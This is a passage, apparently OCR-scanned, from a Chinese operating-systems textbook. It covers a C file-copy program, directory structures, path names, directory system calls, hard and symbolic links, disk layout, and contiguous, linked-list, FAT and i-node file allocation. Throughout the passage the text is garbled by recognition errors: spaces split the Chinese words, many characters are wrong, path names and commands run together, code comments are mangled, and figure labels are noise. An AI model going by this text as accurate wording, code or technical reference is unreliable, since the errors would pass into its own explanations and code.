if (in_fd < 0) exit(2); MRS 
out_fd = creat(argv[2], AOT Mone. /* 创建 目 标 文件 */ 


if (out_fd < 0) exit(3); M 如 果 该 文件 不 能 被 创建 ， 退 出 */ 


能 打开 ， 退 出 */ 


庆 循 环 复制 所 
while (TRUE) { 
rd_count = read(in_fd, buffer, BUF_SIZE); /* 读 一 块 数据 */ 
if (rd_count <= 0) break; 1 如 果 文 件 结束 或 读 时 出 错 ， 退 出 循环 */ 
wt_count = write(out_fd, buffer, rd_count); /* 写 数据 */ 
if (wt_count <= 0) exit(4); /* wt_count <=0 是 一 个 错误 * 


} 


娠 关闭 文件 */ 
close(in_fd); 


close(out_fd); 
if (rd_count == 0) I PEAT A TK */ 


exit(0); 
else 


exit(5); /* AER RE */ 





图 45 复制 文件 的 一 个 简单 程序 


42 目录 


文件 系统 通常 提供 目录 或 文件 末 用 于 记录 文件 ， 在 很 多 系统 中 目录 
本 映 也 是 文件 。 本 节 讨 论 目录 、 目 录 的 组 成 、 目 录 的 特性 和 可 以 对 目录 
进行 的 操作 。 





421 一 级 目录 系统 


目录 系统 的 最 简单 形式 是 在 一 个 目录 中 包含 所 有 的 文件 。 这 有 时 称 
为 根 目录 ， 但 是 由 于 只 有 一 个 目录 ， 所 以 其 名 称 并 不 重要 。 在 早期 的 个 
人 计算 机 中 ， 这 种 系统 很 普遍 ， 部 分 原因 是 因为 只 有 一 个 用 尸 。 有 趣 的 
是 ， 世 界 第 一 台 超 级 计算 机 CDC 6600 对 于 所 有 的 文件 也 只 有 一 个 目 
录 ， 尽 管 该 机 器 同时 被 许多 用 户 使 用 。 这 样 决策 至 无 疑问 是 为 了 使 软件 


设计 简单 。 














一 个 单 层 目录 系统 的 例子 如 图 4-6 所 示 。 该 目录 中 有 四 个 文件 。 这 
一 设计 的 优点 在 于 简单 ， 并 且 能 够 快速 定位 文件 一 一 事实 上 只 有 一 个 地 
方 要 查看 。 这 种 目录 系统 经 常用 于 简单 的 和 入 式 装 置 中 ， 诸 如 电话 、 数 
码 相 机 以 及 一 些 便 携 式 音 乐 播放 器 等 。 


| [AR Ao 
AY (8) ©) © 


图 46 含有 四 个 文件 的 单 层 目录 系统 








4.2.2 ”层次 目录 系统 





对 于 简单 的 特殊 应 用 而 言 ， 单 层 目录 是 合适 的 《〈 单 层 目录 甚至 用 在 
了 第 一 代 个 人 计算 机 中 ) ， 但 是 现在 的 用 户 有 着 成 干 的 文件 ， 如 果 所 有 
的 文件 都 在 一 个 目录 中 ， 寻 找 文 件 吏 几乎 不 可 能 了 。 这 样 ， 惑 需要 有 一 
种 方式 将 相关 的 文件 组 合 在 一 起 。 例 如 ， 某 个 教授 可 能 有 一 些 文件 ， 第 
一 组 文件 是 为 了 一 门 诬 程 而 写作 的 ， 第 二 组 文件 包含 了 学 生 为 为 一 门 诬 
程 所 提交 的 程序 ， 第 三 组 文件 是 他 构造 的 一 个 高 级 编译 -写作 系统 的 代 
码 ， 而 第 四 组 文件 是 奖学金 建议 书 ， 还 有 其 他 与 电子 邮件 、 短 会 、 正 在 
写作 的 文章 、 游 戏 等 有 关 的 文件 。 














这 里 所 需要 的 是 层次 结构 〈 即 ， 一 个 目录 树 ) 。 通 过 这 种 方式 ， 可 
以 用 很 多 目录 把 文件 以 自然 的 方式 分 组 。 进 而 ， 如 果 多 个 用 户 分 享 同一 
个 文件 服务 器 ， 如 许多 公司 的 网 络 系统 ， 每 个 用 户 可 以 为 自己 的 目录 树 
拥有 自己 的 私人 根 目 录 。 这 种 方式 如 图 4-7 所 示 ， 其 中 ， 根 目录 含有 目 
录 A、B 和 C， 分 别 属于 不 同 用 户 ， 其 中 有 两 个 用 户 为 他 们 的 项 目 创建 了 
FARK. 











图 4-7 层次 目录 系统 


用 户 可 以 创建 任意 数量 的 子 目录 ， 这 种 能 力 为 用 户 组 织 其 工作 提供 
了 强大 的 结构 化 工具 。 因 此 ， 几 乎 所 有 现代 文件 系统 部 是 用 这 个 方式 组 


织 的 。 





4.2.3 路径 名 








用 目录 树 组 织 文 件 系 统 时 ， 需 要 有 某 种 方法 指明 文件 名 。 常 用 的 方 
法 有 两 种 。 第 一 种 是 ， 每 个 文件 都 赋予 一 个 绝对 路 径 名 〈absolute path 
name) ， 它 由 从 根 目 录 到 文件 的 路 径 组 成 。 例 如 ， 路 径 /usrastmailbox 
表示 根 目 录 中 有 子 目 录 usr， 而 usr 中 义 有 子 目 录 ast， 文 件 mailbox 束 在 子 
目录 ast 下 。 绝 对 路 径 名 一 定 从 根 目录 开始 ， 且 是 惟一 的 。 在 UNIX 中 ， 
路 径 各 部 分 之 间 用 “分 隔 。 在 Windows 中 ， 分 隔 符 是 “。 在 MULTICS 
中 是 “>”。 这 样 在 这 三 个 系统 中 同样 的 路 径 名 按 如 下 形式 写成 : 











Windows \usr\ast\mailbox 
UNIX /usr/ast/mailbox 
MULTICS >usr>ast>mailbox 





不 管 采用 哪 种 分 隔 符 ， 如 果 路 径 名 的 第 一 个 字符 是 分 隅 符 ， 则 这 个 


路 径 就 是 绝对 路 径 。 


另 一 种 指定 文件 名 的 方法 是 使 用 相对 路 径 名 (relative path 
name) 。 它 常 和 工作 目录 (working directory) 〈 也 称 作 当 前 目录 
(current directory) ) 一 起 使 用 。 用 户 可 以 指定 一 个 目录 作为 当前 工作 
目录 。 这 时 ， 所 有 的 不 从 根 目录 开始 的 路 径 名 都 是 相对 于 工作 目录 的 。 
例如 ， 如 果 当 前 的 工作 目录 是 /usr/ast， 则 绝对 路 径 名 为 /usr/ast/mailbox 








的 文件 可 以 直接 用 mailbox 来 引用 。 也 就 是 说 ， 如 果 工 作 目 录 是 /usrast， 
则 UNIX 命 令 





cp/usr/ast/mailbox/usr/ast/mailbox.bak 





和 命令 





cp mailbox mailbox.bak 





具有 相同 的 含义 。 相 对 路 径 往 往 更 方便 ， 而 它 实 现 的 功能 和 绝对 路 
径 完全 相同 。 








一 些 程序 需要 存 取 某 个 特定 文件 ， 而 不 论 当前 目录 是 什么 。 这 时 ， 
应 该 采用 绝对 路 径 名 。 比 如 ， 一 个 检查 拼写 的 程序 要 读 
件 /usrlib/dictionary， 因 为 它 不 可 能 事先 知道 当前 目录 ， 所 以 就 采用 完整 
的 绝对 路 径 名 。 不 论 当前 的 工作 目录 是 什么 ， 绝 对 路 径 名 总 能 正常 工 
ae 











当然 ， 知 这 个 检查 拼写 的 程序 要 从 目录 /usrvlib 中 读 很 多 文件 ， 可 以 
用 另 一 种 方法 ， 即 执行 一 个 系统 调用 把 该 程序 的 工作 目录 切换 
到 /swlib， 然 后 只 需 用 dictionary 作 为 open 的 第 一 个 参数 。 通 过 显 式 地 改 
变 工 作 目 录 ， 可 以 知道 该 程序 在 目录 树 中 的 确切 位 置 ， 进 而 可 以 采用 相 
对 路 径 名 。 




















每 个 进程 都 有 目 己 的 工作 目录 ， 这 样 在 进程 改变 工作 目录 并 退出 
后 ， 其 他 进程 不 会 受到 影响 ， 文 件 系统 中 也 不 会 有 改变 的 痕迹 。 对 进程 
而 言 ， 切 换 工 作 目 录 是 安全 的 ， 所 以 只 要 需要 ， 就 可 以 改变 当前 工作 目 
录 。 但 是 ， 如 果 改 变 了 库 过 程 的 工作 目录 ， 并 且 工 作 完 毕 之 后 没有 修改 
回去 ， 则 其 他 程序 有 可 能 无 法 正常 运行 ， 因 为 它们 关于 当前 目录 的 假设 
己 经 失效 。 所 以 库 过 程 很 少 改变 工作 目录 ， 辱 非 改 不 可 ， 必 定 要 在 返回 
之 前 改 回 到 原 有 的 工作 目录 。 























支持 层次 目录 结构 的 大 多 数 操作 系统 在 每 个 目录 中 有 两 个 特殊 的 目 
录 项 “.” 和 “..”， 常 读 作 “dot* 和 “dotdot”*。dot 指 当前 目录 ，dotdot 指 其 父 日 
录 〔 在 根 目录 中 例外 ， 根 目录 中 它 指向 自己 )。 要 了 解 怎 样 使 用 它们 ， 
请 考虑 图 4-8 中 的 UNIX 目 录 树 。 一 个 进程 的 工作 目录 是 /asrast， 它 可 采 
用 “.” 沿 树 向 上 。 例 如 ， 可 用 命令 














cp../lib/dictionary. 





把 文件 uswlib/dictionary 复 制 到 目 己 的 目录 下 。 第 一 个 路 径 告诉 系统 
上 溯 《〈 到 usr 目 录 ) ， 然 后 加 下 到 lib 目 录 ， 找 到 dictionary 文 件 。 





—— /usr/jim 


图 48 UNIX RH 





第 二 个 参数 〈.) 指定 当前 目录 。 当 cp 命令 用 目录 名 (包括 “.”) 作 
为 最 后 一 个 参数 时 ， 则 把 全 部 的 文件 复制 到 该 目录 中 。 当 然 ， 对 于 上 述 
复制 ， 键 入 








cp/usr/lib/dictionary. 








是 更 常用 的 方法 。 用 户 这 里 采用 “.” 可 以 避免 键入 两 次 dictionary。 无 
论 如 何 ， 键 入 





cp/usr/lib/dictionary dictionary 








也 可 正常 工作 ， 就 像 键 入 





cp/usr/lib/dictionary/usr/ast/dictionary 








一 样 。 所 有 这 些 命令 都 完成 同样 的 工作 。 


4.2.4 目录 操作 


不 同系 统 中 管理 目录 的 系统 调用 的 差别 比 管 理 文件 的 系统 调用 的 差 
别 大 。 为 了 了 解 这 些 系统 调用 有 哪些 及 它们 怎样 工作 ， 下 面 给 出 一 个 例 
子 〈 取 自 UNIX) 。 


l)create。 创 建 目 录 。 除 了 目录 项 “> 和”“..” 外 ， 目 录 内 容 为 空 。 目 录 
项 “” 和 “..” 是 系统 自动 放 在 目录 中 的 (有 时 通过 mkdir 程 序 完成 〉。 





2)delete。 删 除 目 录 。 只 有 空 目 录 可 删除 。 只 包含 目录 项 “.” 和 “..” 的 
目录 被 认为 是 空 目 录 ， 这 两 个 目录 项 通常 不 能 删除 。 








3)opendir。 目 录 内 容 可 被 读 取 。 例 如 ， 为 列 出 目录 中 全 部 文件 ， 程 
序 必须 先 打开 该 目录 ， 然 后 读 其 中 全 部 文件 的 文件 名 。 与 打开 和 读 文 件 
相同 ， 在 读 目 录 前 ， 必 须 打 开 有 目录 。 


4)closedir。 读 目录 结束 后 ， 应 关闭 目录 以 释放 内 部 表 空 间 。 





5)readdir。 系 统 调 用 readdir 返 回 打 开 目 录 的 下 一 个 目录 项 。 以 前 也 
采用 read 系 统 调用 来 读 目录 ， 但 这 方法 有 一 个 缺点 : 程序 员 必 须 了 解 和 
处 理 目 录 的 内 部 结构 。 相 反 ， 不 论 采 用 哪 一 种 目录 结构 ，readdir 总 是 以 
标准 格式 返回 一 个 目录 项 。 








6)Jrename。 在 很 多 方面 目录 和 文件 都 相似 。 文 件 可 换 名 ， 目 录 也 可 
以 。 





7)link。 连 接 技术 允许 在 多 个 目录 中 出 现 同一 个 文件 。 这 个 系统 调 
用 指定 一 个 存在 的 文件 和 一 个 路 径 名 ， 并 建立 从 该 文件 到 路 径 所 指名 字 
的 连接 。 这 样 ， 可 以 在 多 个 目录 中 出 现 同 一 个 文件 。 这 种 类 型 的 连接 ， 
增加 了 该 文件 的 i 节 点 G-node) 计数 器 的 计数 〈 记 录 含 有 该 文件 的 目录 
项 数目 ) ， 有 时 称 为 硬 连 接 Chard link) 。 


8)unlink。 删 除 目录 项 。 如 采 被 解除 连接 的 文件 只 出 现在 一 个 目录 
中 《通常 情况 ) ， 则 将 它 从 文件 系统 中 删除 。 如 果 它 出 现在 多 个 目录 
中 ， 则 只 删除 指定 路 径 名 的 连接 ， 依 然 保留 其 他 路 径 名 的 连接 。 在 
UNIX 中 ， 用 于 删除 文件 的 系统 调用 (前 面 已 有 论述 ) Sch Late 


unlink。 





最 主要 的 系统 调用 已 在 上 面 列 出 ， 但 还 有 其 他 一 些 调用 ， 如 与 目录 
相关 的 管理 保护 信息 的 系统 调用 。 


关于 连接 文件 的 一 种 不 同 想法 是 符号 连接 。 不 同 于 使 用 两 个 文件 名 
指 问 同一 个 内 部 数据 结构 来 代表 一 个 文件 ， 所 建立 的 文件 名 指 癌 了 命名 
丸 一 个 文件 的 小 文件 3 当 使 用 第 二 个 文件 时 ;例如 打开 时 ;文件 系统 沿 
着 路 径 ， 找 到 在 末端 的 名 字 。 然 后 它 使 用 该 新 名 字 局 动 查找 进程 。 符 号 
连接 的 优点 在 于 它 能 够 跨越 磁盘 的 界限 ， 甚 至 可 以 命名 在 远程 计算 机 上 











的 文件 ， 不 过 符号 连接 的 实现 并 不 如 硬 连 接 那样 有 效率 。 


4.3 文件 系统 的 实现 


现在 从 用 户 角 度 转 到 实现 者 角度 来 考察 文件 系统 。 用 户 关 心 的 是 文 
件 是 怎样 命名 的 、 可 以 进行 哪些 操作 、 目 录 树 是 什么 样 的 以 及 类 似 的 界 
面 问题 。 而 实现 者 感 兴趣 的 是 文件 和 目录 是 怎样 存储 的 、 磁 盘 空 间 是 怎 
样 管理 的 以 及 怎样 使 系统 有 效 而 可 靠 地 工作 等 。 在 下 面 几 节 中 ， 我 们 会 
考察 这 些 文件 系统 的 实现 中 出 现 的 问题 ， 并 讨论 怎样 解雇 这 些 问题 。 





4.3.1 文件 系统 布局 


文件 系统 存放 在 磁盘 上 。 多 数 磁盘 划分 为 一 个 或 多 个 分 区 ， 每 个 分 
区 中 有 一 个 独立 的 文件 系统 。 磁 盘 的 0 号 扇 区 称 为 主 引导 记录 (Master 
Boot Record, MBR) ， 用 来 引导 计算 机 。 在 MBR 的 结尾 是 分 区 表 。 访 
表 给 出 了 每 个 分 区 的 起 始 和 结束 地 址 。 表 中 的 一 个 分 区 被 标记 为 活动 分 
区 。 在 计算 机 被 引导 时 ，BIOS 读 入 并 执行 MBR。MBR 做 的 第 一 件 事 是 
确定 活动 分 区 ， 读 入 它 的 第 一 个 块 ， 称 为 引导 块 〈boot block) ， 并 执 
行 之 。 引 导 块 中 的 程序 将 装载 该 分 区 中 的 操作 系统 。 为 统一 起 见 ， 每 个 
分 区 都 从 一 个 启动 块 开始 ， 即 使 它 不 含有 一 个 可 启动 的 操作 系统 。 不 
过 ， 在 将 来 这 个 分 区 也 许 会 有 一 个 操作 系统 的 。 





除了 从 引导 块 开始 之 外 ， 磁 盘 分 区 的 布局 是 随 着 文件 系统 的 不 同 而 


变化 的 。 文 件 系统 经 常 包 含有 如 图 4-9 所 列 的 一 些 项 目 。 第 一 个 是 超级 
ER (superblock) ， 超 级 块 包含 文件 系统 的 所 有 关键 参数 ， 在 计算 机 局 
动 时 ， 或 者 在 该 文件 系统 首次 使 用 时 ， 把 超级 块 读 入 内 存 。 超 级 块 中 的 
典型 信息 包括 : 确定 文件 系统 类 型 用 的 魔 数 、 文 件 系统 中 数据 块 的 数量 
以 及 其 他 重要 的 管理 信息 。 








整个 磁盘 





分 区 表 磁盘 分 区 


\ ee eM 





图 49 一 个 可 能 的 文件 系统 布局 


接 痢 是 文件 系统 中 空闲 块 的 信息 ， 例 如 ， 可 以 用 位 图 或 指针 列表 的 
形式 给 出 。 后 面 也 许 跟随 的 是 一 组 i 节 点 ， 这 是 一 个 数据 结构 数组 ， 每 
个 文件 一 个 ，i 节 操 说 明了 文件 的 方方面面 。 接 着 可 能 是 根 目 录 ， 它 存 
放 文 件 系统 目录 树 的 根部 。 最 后 ， 磁 盘 的 其 他 部 分 存放 了 其 他 所 有 的 目 
录 和 文件 。 








4.3.2 ”文件 的 实现 


文件 存储 的 实现 的 关键 问题 是 记录 各 个 文件 分 别 用 到 哪些 磁盘 块 。 


不 同 操作 系统 采用 不 同 的 方法 。 这 一 市 ， 我 们 讨论 其 中 的 一 些 方 法 。 


最 简单 的 分 配方 案 是 把 每 个 文件 作为 一 连 串 连续 数据 块 存储 在 人 磁 副 


。 所 以 ， 在 块 大 小 为 1KB 的 磁盘 上 ，50KB 的 文件 要 分 配 50 个 连续 的 
块 。 


对 于 块 大 小 为 2KB 的 磁盘 ， 将 分 配 25 个 连续 的 块 。 


在 图 4-10a 中 是 一 个 连续 分 配 的 例子 。 这 里 列 出 了 头 40 块 ， 从 磊 面 


从 0 块 开始 。 初 始 状态 下 ， 破 盘 是 空 的 。 接 着 ， 从 磁盘 开始 处 〈 块 0) FF 
台 写 入 长 度 为 4 块 的 文件 A。 紧 接着 ， 在 文件 A 的 结尾 开始 写 入 一 个 3 块 
的 文件 B。 


文件 A 文件 C 文件 E 文件 G 











(4 块 ) (6 块 ) (12 块 ) (3 块 ) 

SS AE A i j ` 一 -一 人 -一 
一 一 一 一 一 一 一 一 -一 -一 一 
文件 B 文件 D 文件 F 
(3 块 ) (5 块 ) (6 块 ) 

a) 
(文件 A) (文件 C) (文件 E) (文件 G) 
— A/ OO 
文件 B 5 个 空闲 块 6 个 空闲 块 
b) 


图 410 为 7 个 文件 连续 分 配 空间 ; b) 删 除 文件 DD 和 F 后 磁盘 的 状态 


请 注意 ， 每 个 文件 都 从 一 个 新 的 块 开 始 ， 这 样 如 果 文 件 A 实 际 上 只 
有 31 /, 块 ， 那 么 最 后 一 块 的 结尾 会 浪费 一 些 空间 。 在 图 4-10 中 ， 一 共 列 
出 了 7 个 文件 ， 每 一 个 都 从 前 面 文件 结尾 的 后 续 块 开始 。 加 阴影 是 为 了 
容易 表示 文件 分 隔 ， 在 存储 中 并 没有 实际 的 意义 。 








连续 磁盘 空间 分 配方 案 有 两 大 优势 。 首 先 ， 实 现 简单 ， 记 录 每 个 文 
件 用 到 的 磁盘 块 简化 为 只 需 记 住 两 个 数字 即 可 : 第 一 块 的 磁盘 地 址 和 文 
件 的 块 数 。 给 定 了 第 一 块 的 编号 ， 一 个 简单 的 加 法 就 可 以 找到 任何 其 他 
块 的 编号 。 


其 次 ， 读 操作 性 能 较 好 ， 因 为 在 单个 操作 中 残 可 以 从 磁盘 上 读 出 整 
个 文件 。 只 需要 一 次 寻找 (对 第 一 个 块 )。 之 后 不 再 需要 寻 道 和 旋转 延 





迟 ， 所 以 ， 数 据 以 磁盘 全 带宽 的 速率 输入 。 可 见 连 续 分 配 实 现 简 单 且 具 
A re VE HE © 


但 是 ， 连 续 分 配方 案 也 同样 有 相当 明显 的 不 足 之 处 : 随 着 时 间 的 推 
移 ， 磁 盘 会 变 得 零碎 。 为 了 了 解 这 是 如 何 发 生 的 ， 请 考察 图 4-10b。 这 
里 有 两 个 文件 DMF) 被 删除 了 。 当 删除 一 个 文件 时 ， 它 占用 的 块 自 
然 就 释放 了 ， 在 磁盘 上 留 下 一 堆 空 亲 块 。 磁 盘 不 会 在 这 个 位 置 挤 压 卸 这 
个 空洞 ， 因 为 这 样 会 涉及 复制 空洞 之 后 的 所 有 文件 ， 可 能 会 有 上 百 万 的 
块 。 结 末 是 ， 人 磁盘 上 最 终 既 包括 文件 也 有 空洞 ， 如 图 4-10 中 所 摘 述 的 那 
样 。 





开始 时 ， 雁 片 并 不 是 问题 ， 因 为 每 个 新 的 文件 都 在 先前 文件 的 磁盘 
结尾 写 入 。 但 是 ， 磁 盘 最 终 会 被 充满 ， 所 以 要 么 压缩 磁盘 ， 要 人 么 重新 使 
用 空洞 中 的 空闲 空间 。 前 者 由 于 代价 太 高 而 不 可 行 ， 后 者 需要 维护 一 个 
空洞 列表 ， 这 是 可 行 的 。 但 是 ， 当 创建 一 个 新 的 文件 时 ， 为 了 挑选 合适 
大 小 的 空洞 存 入 文件 ， 就 有 必要 知道 该 文件 的 最 终 大 小 。 


设想 这 样 一 种 设计 的 结果 : 为 了 录入 一 个 文档 ， 用 户 局 动 了 文本 编 
辑 吉 或 字 处 理 软件 。 程 序 首先 询问 最 终 文 件 的 大 小 会 是 多 少 。 这 个 问题 
必须 回答 ， 人 否则 程序 就 不 能 继续 。 如 果 给 出 的 数字 最 后 被 证 明 小 于 文件 
的 实际 大 小 ， 该 程序 会 终止 ， 因 为 所 使 用 的 磁盘 空洞 已 经 满 了 ， 没 有 地 
方 放置 文件 的 剩余 部 分 。 如 果 用 尸 为 了 避免 这 个 问题 而 给 出 不 实际 的 较 
大 的 数字 作为 最 后 文件 的 大 小 ， 比 如 ，100 MB， 编 辑 器 可 能 找 不 到 如 











此 大 的 空洞 ， 从 而 宣布 无 法 创建 该 文件 。 当 然 ， 用 户 有 权 下 一 次 使 用 比 
如 50MB 的 数字 再 次 启动 编辑 器 ， 如 此 进行 下 去 ， 直 到 找到 一 个 合适 的 
空洞 为 上 上 。 不 过 ， 这 种 方式 看 来 不 会 使 用 户 高 兴 。 





然而 ， 存 在 着 一 种 情形 ， 使 得 连续 分 配方 案 是 可 行 的， 而 且 ， 实 际 
上 这 个 办 法 在 CD-ROM 上 被 广泛 使 用 看 。 在 这 里 所 有 文件 的 大 小 都 事先 
知道 ， 并 且 在 CD-ROM 文 件 系统 的 后 续 使 用 中 ， 这 些 文件 的 大 小 也 不 再 
改变 。 在 本 革 的 后 面 ， 我 们 将 讨论 最 第 见 的 CD-ROM 文 件 系 统 。 





DVD 的 情况 有 些 复杂 。 原 则 上 ， 一 个 90 分 钟 的 电影 可 以 编码 成 一 个 
独立 的 、 大 约 4.5GB 的 文件 。 但 是 文件 系统 所 使 用 的 UDF (Universal 
Disk Format) 格式 ， 使 用 了 一 个 30 位 的 数 来 代表 文件 长 度 ， 从 而 把 文件 
大 小 限制 在 1GB。 其 结果 是 ，DVD 电 影 一 般 存 储 在 3 个 或 4 个 1GB 的 连续 
文件 中 。 这 些 构成 一 个 逻辑 文件 (电影 ， 的 物理 文件 块 被 称 作 extents。 








正如 第 1 章 中 所 提 到 的 ， 在 计算 机 科学 中 ， 随 着 新 一 代 技 术 的 出 
现 ， 历 史 往 往 重 复 着 自己 。 多 年 前 ， 连 续 分 配 由 于 其 简单 和 局 性 能 ( 没 
有 过 多 考虑 用 户 友好 性 ) 被 实际 用 在 磁盘 文件 系统 中 。 后 来 由 于 讨厌 在 
文件 创建 时 不 得 不 指定 最 终 文 件 的 大 小 ， 这 个 想法 被 放弃 了 。 但 是 ， 随 
看 CD-ROM、DVD 以 及 其 他 一 次 性 写 光 学 介质 的 出 现 ， 突 然 间 连 续 分 配 
又 成 为 一 个 好 主意 。 所 以 研究 那些 具有 清晰 和 简洁 概念 的 老式 系统 和 思 
想 是 很 重要 的 ， 因 为 它们 有 可 能 以 一 种 令 人 吃 慰 的 方式 在 未 来 系统 中 获 




















存储 文件 的 第 二 种 方法 是 为 每 个 文件 构造 磁 副 块 链表 ， 如 图 4-11 所 
示 。 每 个 块 的 第 一 个 字 作 为 指 癌 下 一 块 的 指针 ， 块 的 其 他 部 分 存放 数 


物理 块 





图 4-11 以 磁盘 块 的 链表 形式 存储 文件 


与 连续 分 配方 案 不 同 ， 这 一 方法 可 以 充分 利用 每 个 磁盘 块 。 不 会 因 
为 磁盘 碎片 《除了 最 后 一 块 中 的 内 部 雁 片 ) MR Be Fe fie Ze Te]. TER, TE 
目录 项 中 ， 只 需要 存放 第 一 块 的 磁盘 地 址 ， 文 件 的 其 他 块 就 可 以 从 这 个 





首 块 地 址 查找 到 。 

















另 一 方面 ， 在 链表 分 配方 案 中 ， 尽 管 顺序 该 文件 非常 方便 ， 但 是 随 
机 存 取 却 相当 缓慢。 要 获得 块 n， 操 作 系 统 每 一 次 都 必须 从 头 开始 ， 并 
且 要 先 读 前 面 的 n-1 块 。 显 然 ， 进 行 如 此 多 的 读 操 作 太 慢 了 。 





而 且 ， 由 于 指针 占 去 了 一 些 字 市 ， 每 个 磁盘 块 存储 数据 的 字 市 数 不 
再 是 2 的 整数 次 虹 。 虽 然 这 个 问题 并 不 是 非常 严重 ， 但 是 怪异 的 大 小 确 
实 降低 了 系统 的 运行 效率 ， 因 为 许多 程序 都 是 以 长 度 为 2 的 整数 次 蛙 来 
读 写 磁盘 块 的 。 由 于 每 个 块 的 前 儿 个 字 市 被 指 疝 下 一 个 块 的 指针 所 占 
据 ， 所 以 要 读 出 完整 的 一 个 块 ， 束 需要 从 两 个 磁盘 块 中 获得 和 拼接 信 
恩 ， 这 束 因 复制 引发 了 额外 的 开销 。 














3. 在 内 存 中 采用 表 的 链表 分 配 


如 果 取 出 每 个 磁盘 块 的 指针 字 ， 把 它 放 在 内 存 的 一 个 表 中 ， 就 可 以 
解决 上 述 链表 的 两 个 不 足 。 图 4-12 表 示 了 图 4-11 所 示例 子 的 内 存 中 表 的 
内 容 。 这 两 个 图 中 有 两 个 文件 ， 文 件 A 依 次 使 用 了 磁盘 块 4、7、2、10 
和 12， 文 件 B 依 次 使 用 了 磁盘 块 6、3、11 和 14。 利 用 图 4-12 中 的 表 ， 可 
以 从 第 4 块 开 始 ， 顺 着 链 走 到 最 后 ， 找 到 文件 A 的 全 部 磁盘 块 。 同 样 ， 
从 第 6 块 开始 ， 顺 着 链 走 到 最 后 ， 也 能 够 找 出 文件 B 的 全 部 磁盘 块 。 这 两 
个 链 都 以 一 个 不 属于 有 效 磁盘 编写 的 特殊 标记 (如 -1) 结束 。 内 存 中 的 
这 样 一 个 表格 称 为 文件 分 配 表 (File Allocation Table, FAT) 。 














文件 A 从 
这 里 开始 
文件 B 从 





—<— AFAR 
图 412 在 内 存 中 使 用 文件 分 配 表 的 链表 分 配 


按 这 类 方式 组 织 ， 整 个 块 都 可 以 存放 数据 。 进 而 ， 随 机 存 取 也 容易 
得 多 。 虽 然 仍 要 顺 痢 链 在 文件 中 得 找 给 定 的 偶 移 量 ， 但 是 整个 链表 都 存 
放 在 内 存 中 ， 所 以 不 需要 任何 磁盘 引用 。 与 前 面 的 方法 相同 ， 不 管 文件 
有 多 大 ， 在 目录 项 中 只 需 记 录 一 个 整数 (起 始 块 号 ) ， 按 照 它 就 可 以 找 
到 文件 的 全 部 块 。 

















这 种 方法 的 主要 缺点 是 必须 把 整个 表 都 存放 在 内 存 中 。 对 于 200 GB 
的 磁盘 和 1KB 大 小 的 块 ， 这 张 表 需要 有 2 亿 项 ， 每 一 项 对 应 于 这 2 亿 个 磁 
盘 块 中 的 一 个 块 。 每 项 至 少 3 个 字 节 ， 为 了 提高 查找 速度 ， 有 时 需要 4 个 
字 节 。 根 据 系 统 对 空间 或 时 间 的 优化 方案 ， 这 张 表 要 占用 600MB 或 
800MB 内 存 ， 不 太 实 用 。 很 显然 FAT 方 案 对 于 大 磁盘 而 言 不 太 合适 。 
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BN TS MED EE BS Bk RE DT E SP 
SOPRA A Gnndex-node) 的 数据 结构 ， 其 中 列 出 了 文件 属性 和 文 
件 块 的 磁盘 地 址 。 图 4-13 中 是 一 个 简单 例子 的 描述 。 给 定 ij 节点， 就 有 可 
能 找到 文件 的 所 有 块 。 相 对 于 在 内 存 中 采用 表 的 方式 而 言 ， 这 种 机 制 基 
有 很 大 的 优势 ， 即 只 有 在 对 应 文件 打开 时 ， 其 i 贡 点 才 在 内 存 中 。 如 宋 
每 个 i 节点 占有 n 个 字 市 ， 最 多 k 个 文件 同时 打开 ， 那 么 为 了 打开 文件 而 
保留 节点 的 数组 所 占据 的 全 部 内 存 仅仅 是 kn 个 字 市 。 只 需要 提前 保留 


> 量 的 空间 。 

















\> 


这 个 数组 通常 比 上 一 节 中 叙述 的 文件 分 配 表 FAT) 所 占据 的 空间 
要 小 。 其 原因 很 简单 ， 保 留 所 有 磁盘 块 的 链接 表 的 表 大 小 正比 于 磁盘 自 
身 的 大 小 。 如 果 磁 盘 有 n 块 ， 该 表 需 要 n 个 表 项 。 由 于 磁盘 变 得 更 大 ， 该 
表格 也 线性 随 之 增加 。 相 反 ，i 节 点 机 制 需要 在 内 存 中 有 一 个 数组 ， 其 
大 小 正比 于 可 能 要 同时 打开 的 最 大 文件 个 数 。 它 与 磁盘 是 10GB、 
100GB 还 是 1000GB 无 关 。 











i 节 点 的 一 个 问题 是 ， 如 果 每 个 ij 节点 只 能 存储 固定 数量 的 磁盘 地 
址 ， 那 么 当 一 个 文件 所 含 的 磁盘 块 的 数目 超出 了 i 市 点 所 能 容纳 的 数目 
怎么 办 ? 一 个 解决 方案 是 最 后 一 个 “磁盘 地 址 ”不 指 问 数据 块 ， 而 是 指 癌 
一 个 包含 磁盘 块 地 址 的 块 的 地 址 ， 如 图 4-13 所 示 。 更 局 级 的 解决 方案 
是 : 可 以 有 两 个 或 更 多 个 包含 磁盘 地 址 的 块 ， 或 者 指向 其 他 存放 地 址 的 
磁盘 块 的 磁盘 块 。 在 后 面 讨 论 UNIX 时 ， 我 们 还 将 涉及 i 节 点 。 











文件 属性 
磁盘 块 0 的 地 址 
磁盘 块 1 的 地 址 
磁盘 块 2 的 地 址 
磁盘 块 3 的 地 址 
磁盘 块 4 的 地 址 
磁盘 块 5 的 地 址 
磁盘 块 6 的 地 址 
人 厂 盘 块 7 的 地 址 
指针 块 的 地 址 












| 





包含 附加 磁盘 
地 址 的 磁盘 块 


图 4-13 i 节点 的 例子 


4.3.3 ”目录 的 实现 


在 读 文件 前 ， 必 须 先 打开 文件 。 打开 文 件 时 ， 操 作 系 统 利 用 用 户 给 
出 的 路 径 名 找到 相应 目录 项 。 目 录 项 中 提供 了 查找 文件 磁盘 块 所 需要 的 
埋 息 。 因 系统 而 异 ， 这 些 信息 有 可 能 是 整个 文件 的 磁盘 地 址 《对 于 连续 
分 配方 案 ) 、 第 一 个 块 的 编号 〈 对 于 两 种 链表 分 配方 案 ) 或 者 是 i 节点 
号 。 无 论 怎 样 ， 目 录 系 统 的 主要 功能 是 把 ASCII 文 件 名 映射 成 定位 文件 
数据 所 需 的 信息 。 











与 此 密切 相关 的 问题 是 在 何 处 存放 文件 属性 。 每 个 文件 系统 维护 诸 
如 文件 所 有 者 以 及 创建 时 间 等 文件 属性 ， 它 们 必须 存储 在 茶 个 地 方 。 一 
种 显而易见 的 方法 是 把 文件 属性 直接 存放 在 目录 项 中 。 很 多 系统 确实 是 
这 样 实现 的 。 这 个 办 法 用 图 4-14a 说 明 。 在 这 个 简单 设计 中 ， 目 录 中 有 
一 个 固定 大 小 的 目录 项 列表 ， 每 个 文件 对 应 一 项 ， 其 中 包含 一 个 (固定 
